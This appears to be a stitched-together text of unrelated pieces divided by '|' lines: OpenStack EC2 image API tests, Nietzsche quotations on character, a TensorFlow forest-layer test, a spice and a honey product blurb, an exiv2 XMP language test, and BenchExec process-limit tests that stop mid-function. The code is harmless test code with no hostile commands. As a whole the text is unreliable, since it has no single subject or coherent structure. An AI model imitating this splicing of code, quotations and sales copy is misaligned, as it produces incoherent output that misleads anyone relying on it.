self.assertIsNotNone(ebs.get('Encrypted'))
self.assertFalse(ebs.get('Encrypted'))
self.assertIsNotNone(ebs.get('VolumeType'))
@testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
def test_describe_image_with_filters(self):
image_id = CONF.aws.ebs_image_id
data = self.client.describe_images(ImageIds=[image_id])
self.assertEqual(1, len(data['Images']))
data = self.client.describe_images(
# NOTE(ft): limit output to prevent timeout over AWS
Filters=[{'Name': 'image-type', 'Values': ['kernel', 'ramdisk']}])
if len(data['Images']) < 2:
self.skipTest("Insufficient images to check filters")
data = self.client.describe_images(
Filters=[{'Name': 'image-id', 'Values': [image_id]}])
self.assertEqual(1, len(data['Images']))
self.assertEqual(image_id, data['Images'][0]['ImageId'])
def test_check_image_operations_negative(self):
# NOTE(andrey-mp): image_id is a public image created by admin
image_id = CONF.aws.image_id
self.assertRaises('InvalidRequest',
self.client.describe_image_attribute,
ImageId=image_id, Attribute='unsupported')
self.assertRaises('AuthFailure',
self.client.describe_image_attribute,
ImageId=image_id, Attribute='description')
self.assertRaises('InvalidParameterCombination',
self.client.modify_image_attribute,
ImageId=image_id, Attribute='unsupported')
self.assertRaises('InvalidParameter',
self.client.modify_image_attribute,
ImageId=image_id, Attribute='blockDeviceMapping')
self.assertRaises('InvalidParameterCombination',
self.client.modify_image_attribute,
ImageId=image_id)
self.assertRaises('AuthFailure',
self.client.modify_image_attribute,
ImageId=image_id, Description={'Value': 'fake'})
self.assertRaises('AuthFailure',
self.client.modify_image_attribute,
ImageId=image_id, LaunchPermission={'Add': [{'Group': 'all'}]})
self.assertRaises('MissingParameter',
self.client.modify_image_attribute,
ImageId=image_id, Attribute='description')
self.assertRaises('InvalidParameterCombination',
self.client.modify_image_attribute,
ImageId=image_id, Attribute='launchPermission')
self.assertRaises('InvalidRequest',
self.client.reset_image_attribute,
ImageId=image_id, Attribute='fake')
self.assertRaises('AuthFailure',
self.client.reset_image_attribute,
ImageId=image_id, Attribute='launchPermission')
self.assertRaises('AuthFailure',
self.client.deregister_image,
ImageId=image_id)
@testtools.skipUnless(CONF.aws.image_id, 'image id is not defined')
def test_create_image_from_non_ebs_instance(self):
image_id = CONF.aws.image_id
data = self.client.describe_images(ImageIds=[image_id])
image = data['Images'][0]
if 'RootDeviceType' in image and 'ebs' in image['RootDeviceType']:
raise self.skipException('image_id should not be EBS image.')
instance_id = self.run_instance(ImageId=image_id)
def _rollback(fn_data):
self.client.deregister_image(ImageId=fn_data['ImageId'])
self.assertRaises('InvalidParameterValue',
self.client.create_image, rollback_fn=_rollback,
InstanceId=instance_id, Name='name', Description='desc')
data = self.client.terminate_instances(InstanceIds=[instance_id])
self.get_instance_waiter().wait_delete(instance_id)
def _create_image(self, name, desc, extra_run_instance_args={}):
image_id = CONF.aws.ebs_image_id
data = self.client.describe_images(ImageIds=[image_id])
image = data['Images'][0]
self.assertTrue('RootDeviceType' in image
and 'ebs' in image['RootDeviceType'])
instance_id = self.run_instance(ImageId=image_id,
**extra_run_instance_args)
instance = self.get_instance(instance_id)
for bdm in instance.get('BlockDeviceMappings', []):
if 'Ebs' in bdm:
self.addResourceCleanUp(self.client.delete_volume,
VolumeId=bdm['Ebs']['VolumeId'])
data = self.client.create_image(InstanceId=instance_id,
Name=name, Description=desc)
image_id = data['ImageId']
image_clean = self.addResourceCleanUp(self.client.deregister_image,
ImageId=image_id)
self.get_image_waiter().wait_available(image_id)
data = self.client.describe_images(ImageIds=[image_id])
for bdm in data['Images'][0].get('BlockDeviceMappings', []):
if 'Ebs' in bdm and 'SnapshotId' in bdm['Ebs']:
snapshot_id = bdm['Ebs']['SnapshotId']
self.addResourceCleanUp(self.client.delete_snapshot,
SnapshotId=snapshot_id)
data = self.client.terminate_instances(InstanceIds=[instance_id])
self.get_instance_waiter().wait_delete(instance_id)
return image_id, image_clean
@testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
def test_create_image_from_ebs_instance(self):
name = data_utils.rand_name('image')
desc = data_utils.rand_name('description')
image_id, image_clean = self._create_image(name, desc)
data = self.client.describe_images(ImageIds=[image_id])
self.assertEqual(1, len(data['Images']))
image = data['Images'][0]
self.assertIsNotNone(image['CreationDate'])
self.assertEqual("ebs", image['RootDeviceType'])
self.assertFalse(image['Public'])
self.assertEqual(name, image['Name'])
self.assertEqual(desc, image['Description'])
self.assertEqual('machine', image['ImageType'])
self.assertNotEmpty(image['BlockDeviceMappings'])
for bdm in image['BlockDeviceMappings']:
self.assertIn('DeviceName', bdm)
data = self.client.deregister_image(ImageId=image_id)
self.cancelResourceCleanUp(image_clean)
@testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
def test_check_simple_image_attributes(self):
name = data_utils.rand_name('image')
desc = data_utils.rand_name('desc for image')
image_id, image_clean = self._create_image(name, desc)
data = self.client.describe_image_attribute(
ImageId=image_id, Attribute='kernel')
self.assertIn('KernelId', data)
data = self.client.describe_image_attribute(
ImageId=image_id, Attribute='ramdisk')
self.assertIn('RamdiskId', data)
# description
data = self.client.describe_image_attribute(
ImageId=image_id, Attribute='description')
self.assertIn('Description', data)
self.assertIn('Value', data['Description'])
self.assertEqual(desc, data['Description']['Value'])
def _modify_description(**kwargs):
self.client.modify_image_attribute(ImageId=image_id, **kwargs)
data = self.client.describe_image_attribute(
ImageId=image_id, Attribute='description')
self.assertEqual(new_desc, data['Description']['Value'])
new_desc = data_utils.rand_name('new desc')
_modify_description(Attribute='description', Value=new_desc)
_modify_description(Description={'Value': new_desc})
data = self.client.deregister_image(ImageId=image_id)
self.cancelResourceCleanUp(image_clean)
@testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
def test_check_bdm_in_image(self):
image_id = CONF.aws.ebs_image_id
data = self.client.describe_images(ImageIds=[image_id])
root_device_name = data['Images'][0]['RootDeviceName']
device_name_prefix = base.get_device_name_prefix(root_device_name)
device_name = device_name_prefix + 'h'
name = data_utils.rand_name('image')
desc = data_utils.rand_name('description')
image_id, image_clean = self._create_image(
name, desc,
extra_run_instance_args={
'BlockDeviceMappings': [{'DeviceName': device_name,
'Ebs': {'VolumeSize': 1}}]})
data = self.client.describe_images(ImageIds=[image_id])
image = data['Images'][0]
for bdm in image['BlockDeviceMappings']:
self.assertTrue('DeviceName', bdm)
data = self.client.deregister_image(ImageId=image_id)
self.cancelResourceCleanUp(image_clean)
@testtools.skipUnless(CONF.aws.run_incompatible_tests,
'By default glance is configured as "publicize_image": "role:admin"')
@testtools.skipUnless(CONF.aws.run_incompatible_tests,
'skip due to bug #1439819')
@testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
def test_check_launch_permission_attribute(self):
name = data_utils.rand_name('image')
desc = data_utils.rand_name('desc for image')
image_id, image_clean = self._create_image(name, desc)
# launch permission
data = self.client.describe_image_attribute(
ImageId=image_id, Attribute='launchPermission')
self.assertIn('LaunchPermissions', data)
self.assertEmpty(data['LaunchPermissions'])
def _modify_launch_permission(**kwargs):
self.client.modify_image_attribute(ImageId=image_id, **kwargs)
data = self.client.describe_image_attribute(
ImageId=image_id, Attribute='launchPermission')
self.assertIn('LaunchPermissions', data)
self.assertNotEmpty(data['LaunchPermissions'])
self.assertIn('Group', data['LaunchPermissions'][0])
self.assertEqual('all', data['LaunchPermissions'][0]['Group'])
data = self.client.describe_images(ImageIds=[image_id])
self.assertTrue(data['Images'][0]['Public'])
self.client.reset_image_attribute(
ImageId=image_id, Attribute='launchPermission')
data = self.client.describe_image_attribute(
ImageId=image_id, Attribute='launchPermission')
self.assertEmpty(data['LaunchPermissions'])
data = self.client.describe_images(ImageIds=[image_id])
self.assertFalse(data['Images'][0]['Public'])
_modify_launch_permission(Attribute='launchPermission',
OperationType='add', UserGroups=['all'])
_modify_launch_permission(LaunchPermission={'Add': [{'Group': 'all'}]})
data = self.client.deregister_image(ImageId=image_id)
self.cancelResourceCleanUp(image_clean)
class ImageRegisterTest(base.EC2TestCase):
valid_image_state = set(('available', 'pending', 'failed'))
@classmethod
@base.safe_setup
def setUpClass(cls):
super(ImageRegisterTest, cls).setUpClass()
cls.image_location = CONF.aws.ami_image_location
if not cls.image_location:
raise cls.skipException('Image materials are not ready in S3')
def test_register_get_deregister_ami_image(self):
image_name = data_utils.rand_name("ami-name")
data = self.client.register_image(
Name=image_name, ImageLocation=self.image_location)
image_id = data['ImageId']
image_clean = self.addResourceCleanUp(self.client.deregister_image,
ImageId=image_id)
self.assertEqual(image_id[0:3], "ami")
data = self.client.describe_images(ImageIds=[image_id])
self.assertEqual(1, len(data['Images']))
image = data['Images'][0]
self.assertEqual(image_name, image['Name'])
self.assertEqual(image_id, image['ImageId'])
self.assertIn(image['State'], self.valid_image_state)
self.get_image_waiter().wait_available(image_id)
self.client.deregister_image(ImageId=image_id)
self.assertRaises('InvalidAMIID.NotFound',
self.client.describe_images,
ImageIds=[image_id])
self.cancelResourceCleanUp(image_clean)
|
The overman...Who has organized the chaos of his passions, given style to his character, and become creative. Aware of life's terrors, he affirms life without resentment.
I can tell by my own reaction to it that this book is harmful." But let him only wait and perhaps one day he will admit to himself that this same book has done him a great service by bringing out the hidden sickness of his heart and making it visible.— Altered opinions do not alter a man’s character (or do so very little); but they do illuminate individual aspects of the constellation of his personality which with a different constellation of opinions had hitherto remained dark and unrecognizable.
Genuine historical knowledge requires nobility of character, a profound understanding of human existence - not detachment and objectivity.
A married philosopher is a comic character.
Whoever has character also has his typical experience, which returns over and over again.
You gave him an opportunity of showing greatness of character and he did not seize it. He will never forgive you for that.
If a man has character, he has also his typical experience, which always recurs.
It is far pleasanter to injure and afterwards beg forgiveness than to be injured and grant forgiveness. He who does the former gives evidence of power and afterwards of kindness of character.
A strong and well-constituted man digests his experiences (deeds and misdeeds all included) just as he digests his meats, even when he has some tough morsels to swallow.
Giving style” to one’s character - a great and rare art! It is exercised by those who see all the strengths and weaknesses of their own natures and then comprehend them in an artistic plan until everything appears as art and reason and even weakness delights the eye.
Solitude makes us tougher towards ourselves and tenderer towards others. In both ways it improves our character.
When one speaks of humanity, the idea is fundamental that this is something which separates and distinguishes man from nature. In reality, however, there is no such separation: "natural" qualities and those called truly "human" are inseparably grown together. Man, in his highest and noblest capacities, is wholly nature and embodies its uncanny dual character. Those of his abilities which are terrifying and considered inhuman may even be the fertile soil out of which alone all humanity can grow in impulse, deed, and work.
The shortest route is not the most direct one, but rather the one where the most favorable winds swell our sails:Mthat is the lesson that seafarers teach. Not to abide by this lesson is to be obstinate: here, firmness of character is tainted with stupidity.
Unresolved dissonances between the characters and dispositions of the parents continue to reverberate in the nature of the child and make up the history of its inner sufferings.
That lies should be necessary to life is part and parcel of the terrible and questionable character of existence.
He who recites dramatic works makes discoveries about his own character.
Thus strength is afforded by good and thorough customs, thus is learnt the subjection of the individual, and strenuousness of character becomes a birth gift and afterwards is fostered as a habit.
A man far oftener appears to have a decided character from persistently following his temperament than from persistently following his principles.
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the hybrid tensor forest model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import
from tensorflow.contrib.tensor_forest.hybrid.python import hybrid_model
from tensorflow.contrib.tensor_forest.hybrid.python.layers import fully_connected
from tensorflow.contrib.tensor_forest.python import tensor_forest
from tensorflow.python.framework import test_util
from tensorflow.python.platform import googletest
class HybridLayerTest(test_util.TensorFlowTestCase):
def setUp(self):
self.params = tensor_forest.ForestHParams(
num_classes=3,
num_features=7,
layer_size=11,
num_layers=13,
num_trees=17,
connection_probability=0.1,
hybrid_tree_depth=4,
regularization_strength=0.01,
regularization="",
weight_init_mean=0.0,
weight_init_std=0.1)
self.params.num_nodes = 2**self.params.hybrid_tree_depth - 1
self.params.num_leaves = 2**(self.params.hybrid_tree_depth - 1)
def testLayerNums(self):
l1 = fully_connected.FullyConnectedLayer(self.params, 0, None)
self.assertEquals(l1.layer_num, 0)
l2 = fully_connected.FullyConnectedLayer(self.params, 1, None)
self.assertEquals(l2.layer_num, 1)
l3 = fully_connected.FullyConnectedLayer(self.params, 2, None)
self.assertEquals(l3.layer_num, 2)
if __name__ == "__main__":
googletest.main()
|
A traditional middle eastern treat. Great on hummus or mixed with olive oil. This refreshing spice blend should be a staple in anyones spice cabinet.
Tin Net weight: 0.9 oz.
|
# -*- coding: utf-8 -*-
import system_tests
@system_tests.CopyFiles("$data_path/exiv2-empty.jpg")
class CheckXmlLang(metaclass=system_tests.CaseMeta):
url = "http://dev.exiv2.org/issues/1058"
filename = system_tests.path("$data_path/exiv2-empty_copy.jpg")
commands = [
## Add titles in 2 languages and one default
"""$exiv2 -M"set Xmp.dc.title lang=de-DE GERMAN" $filename""",
"""$exiv2 -M"set Xmp.dc.title lang=en-GB BRITISH" $filename""",
"""$exiv2 -M"set Xmp.dc.title Everybody else" $filename""",
"""$exiv2 -px $filename""",
## Remove languages, test case for the language
"""$exiv2 -M"set Xmp.dc.title lang=DE-de german" $filename""",
"""$exiv2 -M"set Xmp.dc.title lang=EN-gb" $filename""",
"""$exiv2 -M"set Xmp.dc.title" $filename""",
"""$exiv2 -px $filename""",
]
stdout = [
"",
"",
"",
"""Xmp.dc.title LangAlt 3 lang="x-default" Everybody else, lang="en-GB" BRITISH, lang="de-DE" GERMAN
""",
"",
"",
"",
"""Xmp.dc.title LangAlt 1 lang="de-DE" german
""",
]
stderr = [""] * len(commands)
retval = [0] * len(commands)
|
ค้าขายอาเซียน | ASEAN Economic Community (AEC) ประเทศพม่า | Myanmar Honey Bee 100% & Pure Royal Jelly "Guarantee"
Honey Bee 100% & Pure Royal Jelly "Guarantee"
Honey Bee 1 Kg 120 Baht/Thai --- This price is up to 30 kg.
บริษัท ซี.เค.เอเซีย ฟาร์มมิ่ง จำกัด / C.K. Asia Farming Co., Ltd.
|
# This file is part of BenchExec, a framework for reliable benchmarking:
# https://github.com/sosy-lab/benchexec
#
# SPDX-FileCopyrightText: 2007-2020 Dirk Beyer <https://www.sosy-lab.org>
#
# SPDX-License-Identifier: Apache-2.0
import contextlib
import logging
import os
import re
import subprocess
import sys
import tempfile
import threading
import time
import unittest
import shutil
from benchexec import container
from benchexec import containerexecutor
from benchexec import filehierarchylimit
from benchexec.runexecutor import RunExecutor
from benchexec import runexecutor
from benchexec import util
sys.dont_write_bytecode = True # prevent creation of .pyc files
here = os.path.dirname(__file__)
base_dir = os.path.join(here, "..")
bin_dir = os.path.join(base_dir, "bin")
runexec = os.path.join(bin_dir, "runexec")
trivial_run_grace_time = 0.2
class TestRunExecutor(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.longMessage = True
cls.maxDiff = None
logging.disable(logging.NOTSET) # need to make sure to get all messages
if not hasattr(cls, "assertRegex"):
cls.assertRegex = cls.assertRegexpMatches
def setUp(self, *args, **kwargs):
with self.skip_if_logs(
"Cannot reliably kill sub-processes without freezer cgroup"
):
self.runexecutor = RunExecutor(use_namespaces=False, *args, **kwargs)
@contextlib.contextmanager
def skip_if_logs(self, error_msg):
"""A context manager that automatically marks the test as skipped if SystemExit
is thrown and the given error message had been logged with level ERROR."""
# Note: assertLogs checks that there is at least one log message of given level.
# This is not what we want, so we just rely on one debug message being present.
try:
with self.assertLogs(level=logging.DEBUG) as log:
yield
except SystemExit as e:
if any(
record.levelno == logging.ERROR and record.msg.startswith(error_msg)
for record in log.records
):
self.skipTest(e)
raise e
def execute_run(self, *args, expect_terminationreason=None, **kwargs):
(output_fd, output_filename) = tempfile.mkstemp(".log", "output_", text=True)
try:
result = self.runexecutor.execute_run(list(args), output_filename, **kwargs)
output = os.read(output_fd, 4096).decode()
finally:
os.close(output_fd)
os.remove(output_filename)
self.check_result_keys(result, "terminationreason")
if isinstance(expect_terminationreason, list):
self.assertIn(
result.get("terminationreason"),
expect_terminationreason,
"Unexpected terminationreason, output is \n" + output,
)
else:
self.assertEqual(
result.get("terminationreason"),
expect_terminationreason,
"Unexpected terminationreason, output is \n" + output,
)
return (result, output.splitlines())
def get_runexec_cmdline(self, *args, **kwargs):
return [
"python3",
runexec,
"--no-container",
"--output",
kwargs["output_filename"],
] + list(args)
def execute_run_extern(self, *args, expect_terminationreason=None, **kwargs):
(output_fd, output_filename) = tempfile.mkstemp(".log", "output_", text=True)
try:
runexec_output = subprocess.check_output(
args=self.get_runexec_cmdline(*args, output_filename=output_filename),
stderr=subprocess.DEVNULL,
universal_newlines=True,
**kwargs,
)
output = os.read(output_fd, 4096).decode()
except subprocess.CalledProcessError as e:
print(e.output)
raise e
finally:
os.close(output_fd)
os.remove(output_filename)
result = {
key.strip(): value.strip()
for (key, _, value) in (
line.partition("=") for line in runexec_output.splitlines()
)
}
self.check_result_keys(result, "terminationreason", "returnvalue")
if isinstance(expect_terminationreason, list):
self.assertIn(
result.get("terminationreason"),
expect_terminationreason,
"Unexpected terminationreason, output is \n" + output,
)
else:
self.assertEqual(
result.get("terminationreason"),
expect_terminationreason,
"Unexpected terminationreason, output is \n" + output,
)
return (result, output.splitlines())
def check_command_in_output(self, output, cmd):
self.assertEqual(output[0], cmd, "run output misses executed command")
def check_result_keys(self, result, *additional_keys):
expected_keys = {
"cputime",
"walltime",
"memory",
"exitcode",
"cpuenergy",
"blkio-read",
"blkio-write",
"starttime",
}
expected_keys.update(additional_keys)
for key in result.keys():
if key.startswith("cputime-cpu"):
self.assertRegex(
key,
"^cputime-cpu[0-9]+$",
f"unexpected result entry '{key}={result[key]}'",
)
elif key.startswith("cpuenergy-"):
self.assertRegex(
key,
"^cpuenergy-pkg[0-9]+-(package|core|uncore|dram|psys)$",
f"unexpected result entry '{key}={result[key]}'",
)
else:
self.assertIn(
key,
expected_keys,
f"unexpected result entry '{key}={result[key]}'",
)
def check_exitcode(self, result, exitcode, msg=None):
self.assertEqual(result["exitcode"].raw, exitcode, msg)
def check_exitcode_extern(self, result, exitcode, msg=None):
exitcode = util.ProcessExitCode.from_raw(exitcode)
if exitcode.value is not None:
self.assertEqual(int(result["returnvalue"]), exitcode.value, msg)
else:
self.assertEqual(int(result["exitsignal"]), exitcode.signal, msg)
def test_command_output(self):
if not os.path.exists("/bin/echo"):
self.skipTest("missing /bin/echo")
(_, output) = self.execute_run("/bin/echo", "TEST_TOKEN")
self.check_command_in_output(output, "/bin/echo TEST_TOKEN")
self.assertEqual(output[-1], "TEST_TOKEN", "run output misses command output")
for line in output[1:-1]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_command_error_output(self):
if not os.path.exists("/bin/echo"):
self.skipTest("missing /bin/echo")
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
def execute_Run_intern(*args, **kwargs):
(error_fd, error_filename) = tempfile.mkstemp(".log", "error_", text=True)
try:
(_, output_lines) = self.execute_run(
*args, error_filename=error_filename, **kwargs
)
error_lines = os.read(error_fd, 4096).decode().splitlines()
return (output_lines, error_lines)
finally:
os.close(error_fd)
os.remove(error_filename)
(output_lines, error_lines) = execute_Run_intern(
"/bin/sh", "-c", "/bin/echo ERROR_TOKEN >&2"
)
self.assertEqual(
error_lines[-1], "ERROR_TOKEN", "run error output misses command output"
)
for line in output_lines[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
for line in error_lines[1:-1]:
self.assertRegex(line, "^-*$", "unexpected text in run error output")
(output_lines, error_lines) = execute_Run_intern("/bin/echo", "OUT_TOKEN")
self.check_command_in_output(output_lines, "/bin/echo OUT_TOKEN")
self.check_command_in_output(error_lines, "/bin/echo OUT_TOKEN")
self.assertEqual(
output_lines[-1], "OUT_TOKEN", "run output misses command output"
)
for line in output_lines[1:-1]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
for line in error_lines[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run error output")
def test_command_result(self):
if not os.path.exists("/bin/echo"):
self.skipTest("missing /bin/echo")
(result, _) = self.execute_run("/bin/echo", "TEST_TOKEN")
self.check_exitcode(result, 0, "exit code of /bin/echo is not zero")
self.assertAlmostEqual(
result["walltime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg="walltime of /bin/echo not as expected",
)
if "cputime" in result: # not present without cpuacct cgroup
self.assertAlmostEqual(
result["cputime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg="cputime of /bin/echo not as expected",
)
self.check_result_keys(result)
def test_wrong_command(self):
(result, _) = self.execute_run(
"/does/not/exist", expect_terminationreason="failed"
)
def test_wrong_command_extern(self):
(result, _) = self.execute_run(
"/does/not/exist", expect_terminationreason="failed"
)
def test_cputime_hardlimit(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
with self.skip_if_logs("Time limit cannot be specified without cpuacct cgroup"):
(result, output) = self.execute_run(
"/bin/sh",
"-c",
"i=0; while [ $i -lt 10000000 ]; do i=$(($i+1)); done; echo $i",
hardtimelimit=1,
expect_terminationreason="cputime",
)
self.check_exitcode(result, 9, "exit code of killed process is not 9")
self.assertAlmostEqual(
result["walltime"],
1.4,
delta=0.5,
msg="walltime is not approximately the time after which the process should have been killed",
)
self.assertAlmostEqual(
result["cputime"],
1.4,
delta=0.5,
msg="cputime is not approximately the time after which the process should have been killed",
)
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_cputime_softlimit(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
with self.skip_if_logs(
"Soft time limit cannot be specified without cpuacct cgroup"
):
(result, output) = self.execute_run(
"/bin/sh",
"-c",
"i=0; while [ $i -lt 10000000 ]; do i=$(($i+1)); done; echo $i",
softtimelimit=1,
expect_terminationreason="cputime-soft",
)
self.check_exitcode(result, 15, "exit code of killed process is not 15")
self.assertAlmostEqual(
result["walltime"],
4,
delta=3,
msg="walltime is not approximately the time after which the process should have been killed",
)
self.assertAlmostEqual(
result["cputime"],
4,
delta=3,
msg="cputime is not approximately the time after which the process should have been killed",
)
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_walltime_limit(self):
if not os.path.exists("/bin/sleep"):
self.skipTest("missing /bin/sleep")
(result, output) = self.execute_run(
"/bin/sleep", "10", walltimelimit=1, expect_terminationreason="walltime"
)
self.check_exitcode(result, 9, "exit code of killed process is not 9")
self.assertAlmostEqual(
result["walltime"],
4,
delta=3,
msg="walltime is not approximately the time after which the process should have been killed",
)
if "cputime" in result: # not present without cpuacct cgroup
self.assertAlmostEqual(
result["cputime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg="cputime of /bin/sleep is not approximately zero",
)
self.check_command_in_output(output, "/bin/sleep 10")
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_cputime_walltime_limit(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
with self.skip_if_logs("Time limit cannot be specified without cpuacct cgroup"):
(result, output) = self.execute_run(
"/bin/sh",
"-c",
"i=0; while [ $i -lt 10000000 ]; do i=$(($i+1)); done; echo $i",
hardtimelimit=1,
walltimelimit=5,
expect_terminationreason="cputime",
)
self.check_exitcode(result, 9, "exit code of killed process is not 9")
self.assertAlmostEqual(
result["walltime"],
1.4,
delta=0.5,
msg="walltime is not approximately the time after which the process should have been killed",
)
self.assertAlmostEqual(
result["cputime"],
1.4,
delta=0.5,
msg="cputime is not approximately the time after which the process should have been killed",
)
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_all_timelimits(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
with self.skip_if_logs("Time limit cannot be specified without cpuacct cgroup"):
(result, output) = self.execute_run(
"/bin/sh",
"-c",
"i=0; while [ $i -lt 10000000 ]; do i=$(($i+1)); done; echo $i",
softtimelimit=1,
hardtimelimit=2,
walltimelimit=5,
expect_terminationreason="cputime-soft",
)
self.check_exitcode(result, 15, "exit code of killed process is not 15")
self.assertAlmostEqual(
result["walltime"],
1.4,
delta=0.5,
msg="walltime is not approximately the time after which the process should have been killed",
)
self.assertAlmostEqual(
result["cputime"],
1.4,
delta=0.5,
msg="cputime is not approximately the time after which the process should have been killed",
)
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_input_is_redirected_from_devnull(self):
if not os.path.exists("/bin/cat"):
self.skipTest("missing /bin/cat")
(result, output) = self.execute_run("/bin/cat", walltimelimit=1)
self.check_exitcode(result, 0, "exit code of process is not 0")
self.assertAlmostEqual(
result["walltime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg='walltime of "/bin/cat < /dev/null" is not approximately zero',
)
if "cputime" in result: # not present without cpuacct cgroup
self.assertAlmostEqual(
result["cputime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg='cputime of "/bin/cat < /dev/null" is not approximately zero',
)
self.check_result_keys(result)
self.check_command_in_output(output, "/bin/cat")
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_input_is_redirected_from_file(self):
if not os.path.exists("/bin/cat"):
self.skipTest("missing /bin/cat")
with tempfile.TemporaryFile() as tmp:
tmp.write(b"TEST_TOKEN")
tmp.flush()
tmp.seek(0)
(result, output) = self.execute_run("/bin/cat", stdin=tmp, walltimelimit=1)
self.check_exitcode(result, 0, "exit code of process is not 0")
self.assertAlmostEqual(
result["walltime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg='walltime of "/bin/cat < /dev/null" is not approximately zero',
)
if "cputime" in result: # not present without cpuacct cgroup
self.assertAlmostEqual(
result["cputime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg='cputime of "/bin/cat < /dev/null" is not approximately zero',
)
self.check_result_keys(result)
self.check_command_in_output(output, "/bin/cat")
self.assertEqual(output[-1], "TEST_TOKEN", "run output misses command output")
for line in output[1:-1]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_input_is_redirected_from_stdin(self):
if not os.path.exists("/bin/cat"):
self.skipTest("missing /bin/cat")
(output_fd, output_filename) = tempfile.mkstemp(".log", "output_", text=True)
cmd = self.get_runexec_cmdline(
"--input",
"-",
"--walltime",
"1",
"/bin/cat",
output_filename=output_filename,
)
try:
process = subprocess.Popen(
args=cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
universal_newlines=True,
)
try:
runexec_output, unused_err = process.communicate("TEST_TOKEN")
except BaseException:
# catch everything, we re-raise
process.kill()
process.wait()
raise
retcode = process.poll()
if retcode:
print(runexec_output)
raise subprocess.CalledProcessError(retcode, cmd, output=runexec_output)
output = os.read(output_fd, 4096).decode().splitlines()
finally:
os.close(output_fd)
os.remove(output_filename)
result = {
key.strip(): value.strip()
for (key, _, value) in (
line.partition("=") for line in runexec_output.splitlines()
)
}
self.check_exitcode_extern(result, 0, "exit code of process is not 0")
self.assertAlmostEqual(
float(result["walltime"].rstrip("s")),
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg='walltime of "/bin/cat < /dev/null" is not approximately zero',
)
if "cputime" in result: # not present without cpuacct cgroup
self.assertAlmostEqual(
float(result["cputime"].rstrip("s")),
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg='cputime of "/bin/cat < /dev/null" is not approximately zero',
)
self.check_result_keys(result, "returnvalue")
self.check_command_in_output(output, "/bin/cat")
self.assertEqual(output[-1], "TEST_TOKEN", "run output misses command output")
for line in output[1:-1]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_append_environment_variable(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
(_, output) = self.execute_run("/bin/sh", "-c", "echo $PATH")
path = output[-1]
(_, output) = self.execute_run(
"/bin/sh",
"-c",
"echo $PATH",
environments={"additionalEnv": {"PATH": ":TEST_TOKEN"}},
)
self.assertEqual(output[-1], path + ":TEST_TOKEN")
def test_new_environment_variable(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
(_, output) = self.execute_run(
"/bin/sh", "-c", "echo $PATH", environments={"newEnv": {"PATH": "/usr/bin"}}
)
self.assertEqual(output[-1], "/usr/bin")
def test_stop_run(self):
if not os.path.exists("/bin/sleep"):
self.skipTest("missing /bin/sleep")
thread = _StopRunThread(1, self.runexecutor)
thread.start()
(result, output) = self.execute_run(
"/bin/sleep", "10", expect_terminationreason="killed"
)
thread.join()
self.check_exitcode(result, 9, "exit code of killed process is not 9")
self.assertAlmostEqual(
result["walltime"],
1,
delta=0.5,
msg="walltime is not approximately the time after which the process should have been killed",
)
if "cputime" in result: # not present without cpuacct cgroup
self.assertAlmostEqual(
result["cputime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg="cputime of /bin/sleep is not approximately zero",
)
self.check_command_in_output(output, "/bin/sleep 10")
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_reduce_file_size_empty_file(self):
with tempfile.NamedTemporaryFile() as tmp:
runexecutor._reduce_file_size_if_necessary(tmp.name, 0)
self.assertEqual(os.path.getsize(tmp.name), 0)
def test_reduce_file_size_empty_file2(self):
with tempfile.NamedTemporaryFile() as tmp:
runexecutor._reduce_file_size_if_necessary(tmp.name, 500)
self.assertEqual(os.path.getsize(tmp.name), 0)
def test_reduce_file_size_long_line_not_truncated(self):
with tempfile.NamedTemporaryFile(mode="wt") as tmp:
content = "Long line " * 500
tmp.write(content)
tmp.flush()
runexecutor._reduce_file_size_if_necessary(tmp.name, 500)
